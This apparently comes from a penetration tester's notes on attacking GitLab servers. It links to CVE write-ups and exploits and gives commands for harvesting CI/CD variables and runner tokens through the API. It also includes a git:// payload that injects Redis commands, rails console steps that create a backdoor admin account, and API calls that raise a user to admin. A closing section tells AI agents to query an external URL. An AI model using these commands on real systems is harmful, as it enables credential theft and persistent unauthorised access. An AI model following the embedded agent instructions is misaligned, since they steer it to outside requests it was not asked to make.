# GitLab

* <https://devcraft.io/assets/hacktivitycon-slides.pdf>
* <https://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/>
* <https://github.com/dotPY-hax/gitlab_RCE>

## Search for Secrets

* <https://embracethered.com/blog/posts/2022/hacking-gitlab-servers/>
* <https://rtfm.co.ua/en/git-scanning-repositories-for-secrets-using-gitleaks/>

Search for CI/CD variables and runner tokens:

```bash
TOKEN=`cat token`
GITLAB=gitlab.megacorp.local
API="https://$GITLAB/api/v4"

curl -sH "Authorization: Bearer $TOKEN" "$API/user" | jq

# 1. bash get_project_ids.sh <PAGE_NUMBER> | tee -a projects
curl -sH "Authorization: Bearer $TOKEN" "$API/groups/<GROUP_NAME_OR_ID>/projects/?include_subgroups=true&visibility=private&per_page=100&page=$1" | jq -r '.[].id'

# 2. bash get_secrets.sh
for id in `cat projects`; do
    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq '.path'

    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id/variables" | jq

    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq .runners_token | jq
done
```

Search for credential leaks with [gitleaks](https://github.com/zricethezav/gitleaks):

```
$ eget -qs linux/amd64 "zricethezav/gitleaks" --to gitleaks
$ TMPFILE=`mktemp`; ./gitleaks detect -s . -v -r $TMPFILE > /dev/null; cat $TMPFILE | jq; rm $TMPFILE
```

## GitLab Runners Abuse

* <https://frichetten.com/blog/abusing-gitlab-runners/>
* <https://github.com/Frichetten/gitlab-runner-research>

## SSRF > Redis > RCE (CE/EE)

**CVE-2018-19571, CVE-2018-19585**

* <https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41293>
* <https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/>
* <https://www.exploit-db.com/exploits/49334>

Also possible to use this payload (instead of IPv6) to bypass filter checks for localhost, but works only with `git://` scheme:

```
git://127.0.0.1:6379/%0a<REDIS_COMMANDS>
```

## Path Traversal > LFI > RCE (CE/EE)

**CVE-2020-10977**

* <https://xakep.ru/2020/05/26/gitlab-exploit/>
* <https://www.exploit-db.com/exploits/49076>

## Path Traversal > File Write > RCE (EE)

**CVE-2019-19088**

* <https://gitlab.com/gitlab-org/gitlab/-/issues/36029>

## gitlab-rails

* <https://docs.gitlab.com/ee/user/profile/account/create_accounts.html>

Add new admin user from console:

```ruby
$ sudo gitlab-rails console
irb(main):001:0 > ActiveRecord::Base.logger = Logger.new($stdout)
irb(main):002:0 > User.find(1)
=> #<User id:1 @root>
irb(main):003:0 > user = User.create(:username => 'snovvcrash', :password => 'Passw0rd!', :password_confirmation => 'Passw0rd!', :admin => true, :name => 'snovvcrash', :email => 'snovvcrash@megacorp.local')
irb(main):004:0 > user.save!
irb(main):005:0 > user.confirmation_token
=> "ZVrM4KsyEdSoTJvo8kx_"
```

Then activate the account by navigating to `https://gitlab.megacorp.local/users/confirmation?confirmation_token=ZVrM4KsyEdSoTJvo8kx_`.

Or just skip the verification:

```ruby
irb(main):003:0 > user.skip_confirmation!
irb(main):004:0 > user.save!
```

Also for GitLab >= 16.11 personal space assignment is required:

```ruby
irb(main):003:0 > user.assign_personal_namespace(Organizations::Organization.default_organization)
irb(main):004:0 > user.save!
```

Enable password authentication for web (e. g., when only LDAP authentication is available):

```ruby
$ sudo gitlab-rails console
irb(main):001:0 > Gitlab::CurrentSettings.update!(password_authentication_enabled_for_web: true)
irb(main):002:0 > exit
$ sudo gitlab-ctl reconfigure
```

Grant a low-priv user admin's privileges via API:

```bash
# Check token priveleges
$ curl -sX GET -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/user" | jq '.is_admin'
# Grant low-priv user admin's privileges
$ curl -sX PUT -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/users/$LOWPRIV_ID" -d "admin=true" | jq '.is_admin'
# Revert low-priv user's original privileges
$ curl -sX PUT -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/users/$LOWPRIV_ID" -d "admin=false" | jq '.is_admin'
```

## Arbitrary File Read

**CVE-2023-2825**

* <https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/>
* <https://github.com/Occamsec/CVE-2023-2825#cve-2023-2825>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.